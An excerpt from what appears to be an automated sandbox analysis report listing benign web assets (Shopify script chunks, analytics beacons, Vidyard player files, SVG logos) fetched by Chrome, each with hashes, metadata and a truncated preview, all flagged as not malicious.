                                                                    SHA-512:6255A69C252973CB2C1B263DDABC00952584F79D7384444A8589695E7B419AEA7EDF20A6319AFA203454F0BFBD12FA63F54F2CEEB6B688DC9DB463CF896AAEE5
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3BB243SZ.js
                                                                    Preview:import{b as c}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-CAR3Y4F6.js";import{g as P}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-MAVCSIGR.js";import{v as y}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-YGRQU55U.js";import{e as h}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-NQDYGCFV.js";import{a as d,g as f}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-7DGIB4XT.js";import{X as p,ba as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{u as l}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-52DI3OUV.js";import{a as e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var i=o(e());function
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (898)
                                                                    Category:downloaded
                                                                    Size (bytes):5653
                                                                    Entropy (8bit):5.230821722884204
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:6F0EB39CE58D1A9C7C5F989593E522D3
                                                                    SHA1:301549051D3CB5BD62C2194F3C9ED56F2F142D9F
                                                                    SHA-256:5C2399E63CA7A8460D0E8308A9BF9F4E582DD300F8455B8D473FEF129245AE98
                                                                    SHA-512:58C0EA22CCBED11FC2C8AFA727A3372B00E623B1ADCA85C1A620A57E21C81A4DEA9E3E2CFA6B1E28C7ABC23D23657F40CD111061850287D0064A2566E44BB6E6
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://a.visme.co/a.js
                                                                    Preview:var VismeStats=function(){var base="https://a.visme.co/";var completeSent=false;var completionPercent=0;var sendBeacon=(navigator&&typeof navigator.sendBeacon=='function')?navigator.sendBeacon.bind(navigator):undefined;function fallbackSend(url){try{if(fetch){fetch(url,{mode:'no-cors',credentials:'omit',method:'POST',});}else{var img=document.createElement('img');img.src=url;}}catch(err){}}.function api(params){var url=base+"info";url+="?cid="+e(cid);url+="&o="+e(object_id);url+="&n="+n;for(var i in params){url+="&"+i+"="+e(params[i]);}.url+="&_="+new Date().getTime();if(sendBeacon){try{sendBeacon(url);}catch(err){fallbackSend(url);}}else{fallbackSend(url);}}.function generateID(){var id="";var chars="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";for(var i=0;i<16;i++){id+=chars.charAt(Math.floor(Math.random()*chars.length));}.return id;}.function getTotalSlides(){if(typeof window.slidesCount!='undefined'&&window.slidesCount>=1){return window.slidesCount;}.var n=docume
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (722)
                                                                    Category:downloaded
                                                                    Size (bytes):723
                                                                    Entropy (8bit):5.085578269543588
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:818392E9E1CA324FD208E18BDEDDD886
                                                                    SHA1:A9182A930294812D09483775FDC789DA82287F1D
                                                                    SHA-256:7FB3D1ED3919E1636ACD0A90278A6FC2831CBE9B52E307F3C900376E38728171
                                                                    SHA-512:80F22C500BAF4FC14F7B1904A9954C5CEABA73865997E92FE412026BB923AECA31E76A331C45E903EE38369F641082DBE62BEA9B60101F6F1F41CB1721E2F69A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-VSRONMTM.js
                                                                    Preview:import{a as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var o=d(r()),t=e=>{(0,o.useEffect)(()=>{if(!(!document.body||!document.body.classList))return e?(document.body.classList.add("u-prevent-scroll","overflow-hidden"),document.body.style.overflow="hidden"):(document.body.classList.remove("u-prevent-scroll","overflow-hidden"),document.body.style.removeProperty("overflow")),()=>{!document.body||!document.body.classList||(document.body.classList.remove("u-prevent-scroll","overflow-hidden"),document.body.style.removeProperty("overflow"))}},[e])};export{t as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (37544)
                                                                    Category:downloaded
                                                                    Size (bytes):232943
                                                                    Entropy (8bit):5.33488959739582
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:9619765951BB17B2D9473BC862027FBE
                                                                    SHA1:DB94D50106340FDDB535A9A03D3AB6C4ED176035
                                                                    SHA-256:5991D8E2A65AD264E12FC33EC8C74F5CDD7B497FEC8E316210D99FA77278005B
                                                                    SHA-512:DDDC9C64F7FFC143DAE9BDD4375C85540ADE4E4ED150F57C4192341074C544DABF6C3A5055F2476857D49A6FB9C007DFAD3F313BC3BA05FF14C61352DF494B8F
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-52DI3OUV.js
                                                                    Preview:import{a as At}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{b as ea,c as nl,e as Mt}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var wc=nl(X=>{"use strict";function oa(e,t){var n=e.length;e.push(t);e:for(;0<n;){var r=n-1>>>1,o=e[r];if(0<rl(o,t))e[r]=t,e[n]=o,n=r;else break e}}function ct(e){return e.length===0?null:e[0]}function ll(e){if(e.length===0)return null;var t=e[0],n=e.pop();if(n!==t){e[0]=n;e:for(var r=0,o=e.length,l=o>>>1;r<l;){var i=2*(r+1)-1,a=e[i],u=i+1,s=e[u];if(0>rl(a,n))u<o&&0>rl(s,a)?(e[r]=s,e[u]=n,r=u):(e[r]=a,e[i]=n,r=i);else if(u<o&&0>rl(s,n))e[r]=s,e[u]=n,r=u;else break e}}return t}function rl(e,t){var n=e.sortIndex-t.sortIndex;return n!==0?n:e.id-t.id}typeof performance=="object"&&typeof performance.now=="function"?(cc=performance,X.unstable_now=function(){return cc.now()}):(ta=Date,dc=ta.now(),X.unstable_now=function(){return ta.now()-dc});var cc,ta,dc,St=[],Gt=
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                    Category:downloaded
                                                                    Size (bytes):21246
                                                                    Entropy (8bit):7.967587178843157
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:1923CC4C36A6E097B353BFAE5FAE792E
                                                                    SHA1:D0EE34037A3D97CEAFA47439AD3B7B57C6FC4E99
                                                                    SHA-256:8CF551A2DB24CED2CD9B1CEAFCCF20A22576C6D72E6E3829C1C49C637574340A
                                                                    SHA-512:DED338930A510FDE8B69C03709464F05A12802305C6C6D59E8175F8C520DF67577C2F3AE7200366B9F51D7813261A2FE930041E10712A1908D4C74F0BD094E66
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure/assets/home/redesign2022/carousel-1-mobile-small-21ae4e287eb9c87f9eeca84adbc0c9aaf8fd13ff6cce71c01f0202aabba27b92.png
                                                                    Preview:RIFF.R..WEBPVP8X....8...i.....ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH.....7@&`..K.%... .+x.mK.lK....@.....A.......?.t.D...d....O......$.`.......k.1..U..U.{..JU..........P......i.t.....>J..1h.B.J.....ARs..9.uD.)-..~#..bO4i..S].i.......:.-b..j.......m.Y.Q.[.....G...[.6.....K|...rW.C..X.h....B.\..9.^..... .!>....1.4.T.Q...>.$..B..r..k..U=..|.a.%.B..R.Q...I.S..@.L$.2tr...E....R$...%...n.B..^{Q.b_..).1&P..(. .(..o.AU..X%..~H..T.m...c.>.9.E.....+J ..Z.;..t.e5....,[KZd.L.g.9.q.m\....}....VS$....:......2.1..@Y.9."t...!. (2 ._u...........V.M...v.d.".t.~)..J..ZtH....B.:.^B.IU
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (19986), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):19986
                                                                    Entropy (8bit):5.253227111919225
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:DD1D068FDB5FE90B6C05A5B3940E088C
                                                                    SHA1:0D96F9DF8772633A9DF4C81CF323A4EF8998BA59
                                                                    SHA-256:6153D13804862B0FC1C016CF1129F34CB7C6185F2CF4BF1A3A862EECDAB50101
                                                                    SHA-512:7AEA051A8C2195A2EA5EC3D6438F2A4A4052085B370CF4728B056EDC58D1F7A70C3F1F85AFE82959184869F707C2AC02A964B8D9166122E74EBC423E0A47FA30
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317
                                                                    Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):181
                                                                    Entropy (8bit):5.1572281590340445
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8318AB0804EDE00082C9380DD35EE0F9
                                                                    SHA1:4E51666D012D5C96A99F16B0FBB794398082D951
                                                                    SHA-256:B6320E221B61F50FDFEE02E86288ACA6B426795DD014C5ADD80FCEF7632AC6F8
                                                                    SHA-512:4A541C141E1153CBAB86534015D3F42E48D742726D5B0B9A7AF13DE8DDBCD4114855CFD8BBDF5CD239F5D0C256E9F92293EBDDB91A92FB301FC94224B57B314D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.vidyard.com/play/stylesheets/6-bb46c076ab8a68fddf8952227c9acda6.css
                                                                    Preview:._1l-KU{position:absolute;top:-1px;left:-1px;height:calc(100% + 2px);width:calc(100% + 2px);cursor:pointer;background:black}._1l-KU._3OgU3{cursor:none}._1l-KU._3-9KU{display:none}..
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (3277)
                                                                    Category:downloaded
                                                                    Size (bytes):3278
                                                                    Entropy (8bit):5.418089600046086
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:BF23011D70170701395D9B868B1B80DB
                                                                    SHA1:BBF64076F22143525AF58F4FFEAB61C00D814FF3
                                                                    SHA-256:081B424186F38FCF5BB9DDB49116D5A6FD7A0E6D891D08AEFE93803C845B774F
                                                                    SHA-512:17DA5E097DDD14EB7DEF546EAD1904973ECA2E53521BE152096B0AE45CAD06B5510D59D524E08B69F7A5BCD52481747BA5807590D930A03924FD10720B189823
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-CAR3Y4F6.js
                                                                    Preview:import{e as c}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-NQDYGCFV.js";import{a as S}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-SWIYBLVM.js";import{a as h,b as y,d as B}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LEHU3LRW.js";import{b as C,c as g}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-2IKKNHFG.js";import{T as v,ba as w}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{a as z}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TV7DYCAO.js";import{a as N}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{a as k}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var T=r(
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):6313
                                                                    Entropy (8bit):4.389421802757959
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:702BC0FE7229ACDEF65D55F7AE1422AB
                                                                    SHA1:2CC9BD257FB2D64A9A07DE719C053609078EF8A5
                                                                    SHA-256:CCCD236A92C4ED80684DCFE11C76E3E35757CBE4781773DA26C4699EB24BB84B
                                                                    SHA-512:6E996C55DE45DE1582F5E68875E8398D20487348924CCFCF8BDB39D3D4ACB731027EB876A662F57799711503FE4EE01B475E5A40F959EAB54F3EFF5C0683BD57
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/702bc0fe7229acdef65d55f7ae1422ab.svgz
                                                                    Preview:<svg width="119" height="63" viewBox="0 0 119 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="118" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1303_6127)"/>.<mask id="mask0_1303_6127" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="19" y="25" width="82" height="13">.<path d="M101 25H19V37.3337H101V25Z" fill="white"/>.</mask>.<g mask="url(#mask0_1303_6127)">.<path d="M66.6189 26.7095V28.4857H65.0771V29.0382H66.6189V37.0977H67.254V29.0382H69.0466V28.4857H67.255V26.7592C67.255 25.8066 67.8081 25.5525 68.512 25.5525C68.7653 25.5552 69.0178 25.5829 69.2657 25.6351V25.0836C69.0178 25.0309 68.7654 25.0029 68.512 25C67.4726 25 66.6189 25.5028 66.6189 26.7095Z" fill="black"/>.<path d="M75.2457 29.0713V28.4352C73.6876 28.3679 72.2798 29.273 71.9458 30.3955H71.8929V28.4844H71.2578V37.0975H71.8929V32.3871C71.9601 31.0968 72.2279 30.5607 72.8641 29.907C73.1727 29.5978 73.5474 29.3619 73.9597 29.2169C74.3719 29.0719 74.8112 29.0214 75.2457
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (918)
                                                                    Category:downloaded
                                                                    Size (bytes):919
                                                                    Entropy (8bit):5.213585135681088
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C0A3B130B231E9CF685AA64979A1E165
                                                                    SHA1:73BB3600B7C323F50DDD579AA12DC29ADC5854F4
                                                                    SHA-256:D0AB5D7513ECD3F97EA64D435042B6CAF371FD62A28B20FFD9C75CFEA9429752
                                                                    SHA-512:B6F353A67098EDE9E6C376D450D2FA90A3E1622C10907A20D6471B76EE2215CC8FC1A6E495B509EC4ED0C20FA3E35DA1B2409A6200FE25692248BA979066CA22
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-OZUJT76U.js
                                                                    Preview:import{a as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as s}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var i=s(d());function u(n="",c={}){let a=Object.entries(c).filter(([,t])=>typeof t<"u").reduce((t,[r,o],p)=>r==="crop"&&o==="none"?t:`${t}${p===0&&!n.includes("?")?"?":"&"}${r}=${o}`,"");return`${n}${a}`}function y({alt:n="",className:c,componentName:g="image",crop:a="none",decoding:t,height:r,loading:o,src:p,srcSet:h,sources:f,width:m}){return(0,i.jsxs)("picture",{"data-component-name":g,children:[f?.map((e,l)=>(0,i.jsx)("source",{srcSet:u(e.srcSet,{width:e.width,height:e.height,crop:e.crop}),media:e.media,width:e.width,height:e.height,type:e.type},l)),(0,i.jsx)("img",{alt:n,className:c,decoding:t,height:r,loading:o,src:u(p,{width:m,height:r,crop:a}),srcSet:h,width:m})]})}export{u as a,y as b};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):7015
                                                                    Entropy (8bit):4.083091151739225
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:CF717A7B1FBD3B1F4160CF39A1C96E19
                                                                    SHA1:8C6F2CBC32F067C7F845FD72B1C1BA503B5FC81E
                                                                    SHA-256:68F3E54B7EC067AB8ABC7F0DD79027CB45CB30E5A8DB4CAA2C92F16514C51D32
                                                                    SHA-512:227D1FA96D73ED4F3B180CE7266A281E68794199337EBFFC414692038060CD09863F152723D72DA4BAAF53BE6D4B688648C410C651C6B16432DE1F3FDD440090
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/cf717a7b1fbd3b1f4160cf39a1c96e19.svgz
                                                                    Preview:<svg width="156" height="65" viewBox="0 0 156 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="154" height="63" rx="7.79" fill="white"/>.<path d="M136.625 40.2412C131.412 40.2412 126.059 40.2412 120.671 40.2412C120.671 34.8763 120.671 29.5465 120.671 24.123C126.036 29.5582 131.366 34.9349 136.625 40.2412Z" fill="black"/>.<path d="M45.5857 34.9235C45.5857 31.3039 45.5857 27.743 45.5857 24.182C46.4994 24.182 47.3897 24.182 48.2916 24.182C48.2916 29.5586 48.2916 34.9235 48.2916 40.3353C47.6708 40.3353 47.0617 40.347 46.4526 40.3236C46.3706 40.3236 46.2886 40.2064 46.23 40.1244C43.6295 36.7157 41.0408 33.307 38.4403 29.8983C38.3583 29.7929 38.2763 29.6874 38.1475 29.5235C38.1475 33.1664 38.1475 36.7274 38.1475 40.3236C37.2338 40.3236 36.3553 40.3236 35.4533 40.3236C35.4533 34.9469 35.4533 29.582 35.4533 24.1702C35.7813 24.1702 36.1327 24.2054 36.4607 24.1585C37.1167 24.0648 37.5032 24.3342 37.9015 24.8496C40.3731 28.1412 42.8799 31.4094 45.3749 34.6775C45.4335 3
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):11937
                                                                    Entropy (8bit):3.903874139360659
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:FA87C2035B450B03766D25537D3056ED
                                                                    SHA1:D686205774E8FCAEC558C63A28F9D0810EDE981D
                                                                    SHA-256:249C2F1589149F2CEE37C838778E361F6C5E107784331087BAC51F5B2E5CF1F2
                                                                    SHA-512:A2B2CEB6E23DB316AFCC8FC4B22C8E6CC3905CBCFE4E0FEA18D41769B5BDFD252DF75AABAD5D913B828FC3EF0DDDB36F51DD55C01766BF5B0D66FE0B94E95AB7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="153" height="63" viewBox="0 0 153 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="152" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1549_7015)"/>.<path d="M39.6693 47.1156C39.6693 47.0303 39.6907 46.9236 39.6907 46.8383C39.6907 39.6072 39.6907 32.3547 39.6907 25.1236C39.6907 25.0596 39.6907 24.9956 39.6907 24.953C39.6693 24.825 39.7333 24.761 39.84 24.7183C40.1386 24.569 40.4159 24.3984 40.7145 24.2277C43.1676 22.8839 45.6419 21.5187 48.095 20.1749C50.3987 18.9164 52.7237 17.6365 55.0275 16.378C55.0914 16.3353 55.1554 16.314 55.2621 16.2713C55.2194 16.378 55.1981 16.4207 55.1768 16.4847C54.2595 18.2978 53.3423 20.1322 52.4251 21.9453C51.4652 23.8438 50.5053 25.7635 49.5455 27.662C48.5642 29.6244 47.5617 31.5868 46.5805 33.5492C45.258 36.1942 43.9141 38.8179 42.5916 41.4629C41.6531 43.34 40.6932 45.2171 39.7547 47.0729C39.7547 47.0942 39.7547 47.1156 39.7547 47.1156C39.6907 47.1156 39.6907 47.1156 39.6693 47.1156ZM23.7566
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65261)
                                                                    Category:downloaded
                                                                    Size (bytes):448142
                                                                    Entropy (8bit):5.41933535393878
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2DE23C389B76132B75BAFC40964F14AB
                                                                    SHA1:F9F78C75C17CCD755D54896F0D3B469FBDC02248
                                                                    SHA-256:151CC27F854B082CE9BE45C1D62DE5BE344363BF5085935669353AD902709A4A
                                                                    SHA-512:8F1989594FEE55AEEB64B670DDB324AB2FE5C3E7AA0D6D6D55E1AAEDD96CF2B158CAF297D8C4352D4CB46E6A557B9E236B058EA276A68310E5E932F4F2DEC634
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.vidyard.com/play/js/7-3b17bdd35f1834729bf3956d98183551.js
                                                                    Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[7],{1300:./*!*********************************************!*\. !*** ../node_modules/mux-embed/dist/mux.js ***!. \*********************************************/./*! no static exports found */./*! exports used: default */./*! ModuleConcatenation bailout: Module is not an ECMAScript module */function(t,e,r){t.exports=function(r){function i(t){if(n[t])return n[t].exports;var e=n[t]={i:t,l:!1,exports:{}};return r[t].call(e.exports,e,e.exports,i),e.l=!0,e.exports}var n={};return i.m=r,i.c=n,i.d=function(t,e,r){i.o(t,e)||Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:r})},i.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return i.d(e,"a",e),e},i.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},i.p="",i(i.s=16)}([function(e,t,r){!function(t){t="undefined"!=typeof window?window:void 0!==t?t:"undefined"!=typeof self?self:{};e.exports=t}.call(t,r(6))},function(t,e){function
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (2789)
                                                                    Category:downloaded
                                                                    Size (bytes):2790
                                                                    Entropy (8bit):5.727224916189509
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:7DC217AE967FE81E58E37BABCBC909EE
                                                                    SHA1:41D14D71BC9F23506A262FDBEB12649FD86F4307
                                                                    SHA-256:76A320327680CF79520EBA0105715D74AA022BF0B5F77E9FFDD8352198A561EA
                                                                    SHA-512:F70A1852EB7527F12BDF97F7E688FB94137CE2ACADCA0BD2EA663274A611B5CDC31A71A7C69422A344BE4A45091FC8FF0ED3DAEBE35A5CD71E30141C0BDAD84D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PD2NQNQL.js
                                                                    Preview:import{a as E,b as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-FVEZ4QIF.js";var p={APP_ENV:"production",PAGE_VISIBILITY:"published",SHOPIFY_ADMIN_BASE_URI:"https://admin.shopify.com",SHOPIFY_APP_SERVICE:"brochure-iii-remix",SHOPIFY_ENABLE_HYDRATION_META_TAG:"true",SHOPIFY_SIGNUP_BASE_URI:"https://accounts.shopify.com",SHOPIFY_APP_ENV:"production",SHOPIFY_SERVER_PORT:"",PARTNERS_SERVER_PORT:"",SHOPIFY_BRANDLIVE_EMBED_URL:"https://brnd.live"};function s(e,o){return p[e]||o||""}var g=e=>{if(typeof document>"u")return;let o=new RegExp(`(?:^|; )${e}=([^;]*)(?:$|; )`),t=document?.cookie.match(o);return t?decodeURIComponent(t[1]):""},b=(e,o,t)=>{if(typeof document>"u"){console.warn("setCookie should only be called client-side",new Error("setCookie called outside of browser context."));return}let n=`${encodeURIComponent(e)}=${encodeURIComponent(o)}`;if(t.maxage&&(t.maxage<0?t.expires=new Date(0):t.expires=new Date(new Date().getTime()+t.maxage)),t.path&&(n
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (1007)
                                                                    Category:downloaded
                                                                    Size (bytes):1008
                                                                    Entropy (8bit):5.080384039134741
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C21E1E9C1AD249DB58A4C125ED63EE3C
                                                                    SHA1:395B3D067629537FF57E19C3FA745C9BB948787D
                                                                    SHA-256:F6C184D424F722CF47E1B645A4F426D5E72F22264C33616AA98A23C0BB811082
                                                                    SHA-512:52BD56279C18437A596B2DF8FC98DAB723DE3607996479DB22EB93A667068DC66B7C57DF55D08C4C181B627FBB78ADC55E723BC17F2232236C722A61712DD9C7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js
                                                                    Preview:function f(n){var e,t,r="";if(typeof n=="string"||typeof n=="number")r+=n;else if(typeof n=="object")if(Array.isArray(n))for(e=0;e<n.length;e++)n[e]&&(t=f(n[e]))&&(r&&(r+=" "),r+=t);else for(e in n)n[e]&&(r&&(r+=" "),r+=e);return r}function m(){for(var n,e,t=0,r="";t<arguments.length;)(n=arguments[t++])&&(e=f(n))&&(r&&(r+=" "),r+=e);return r}var y=n=>typeof n=="boolean"?"".concat(n):n===0?"0":n,x=m,O=(n,e)=>t=>{var r;if(e?.variants==null)return x(n,t?.class,t?.className);let{variants:d,defaultVariants:u}=e,N=Object.keys(d).map(l=>{let a=t?.[l],o=u?.[l];if(a===null)return null;let i=y(a)||y(o);return d[l][i]}),v=t&&Object.entries(t).reduce((l,a)=>{let[o,i]=a;return i===void 0||(l[o]=i),l},{}),V=e==null||(r=e.compoundVariants)===null||r===void 0?void 0:r.reduce((l,a)=>{let{class:o,className:i,...b}=a;return Object.entries(b).every(C=>{let[c,s]=C;return Array.isArray(s)?s.includes({...u,...v}[c]):{...u,...v}[c]===s})?[...l,o,i]:l},[]);return x(n,N,V,t?.class,t?.className)};export{x as a,O
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):931
                                                                    Entropy (8bit):5.37373469213044
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:6A1FF42B8323326C31F69E7559A7BD14
                                                                    SHA1:26597CDA428F0E0E9D2045880B4EE349794A88E5
                                                                    SHA-256:412AD48E694A18AD3FBD981BD2084670B732C4BBBDB8EB1E9B350BF783E4F039
                                                                    SHA-512:EE292566E2676FD30F408200075BFCB5A532CD93E8AE60F2103EE36FBA814566975718DAC7DCA06A918D1311D0AA478ACC92C8C34A3DFB38DA7EEF5B8A707A8B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="119" height="63" viewBox="0 0 119 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="118" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1296_6177)"/>.<g clip-path="url(#clip0_1296_6177)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M73.331 20.2363V29.7785H67.9176L76.9498 37.811L70.388 44.8735L59.9998 35.6357L49.6116 44.8745L43.0498 37.812L52.082 29.7775H46.657V20.2363H73.331Z" fill="black"/>.</g>.<defs>.<radialGradient id="paint0_radial_1296_6177" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(113.5 101.5) rotate(-123.956) scale(149.493 282.376)">.<stop stop-color="#4BFE85"/>.<stop offset="0.578125" stop-color="#E7EEEB"/>.<stop offset="1" stop-color="#C5E6F0"/>.</radialGradient>.<clipPath id="clip0_1296_6177">.<rect width="33.9" height="25.1111" fill="white" transform="translate(43.0498 20)"/>.</clipPath>.</defs>.</svg>.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (3250)
                                                                    Category:downloaded
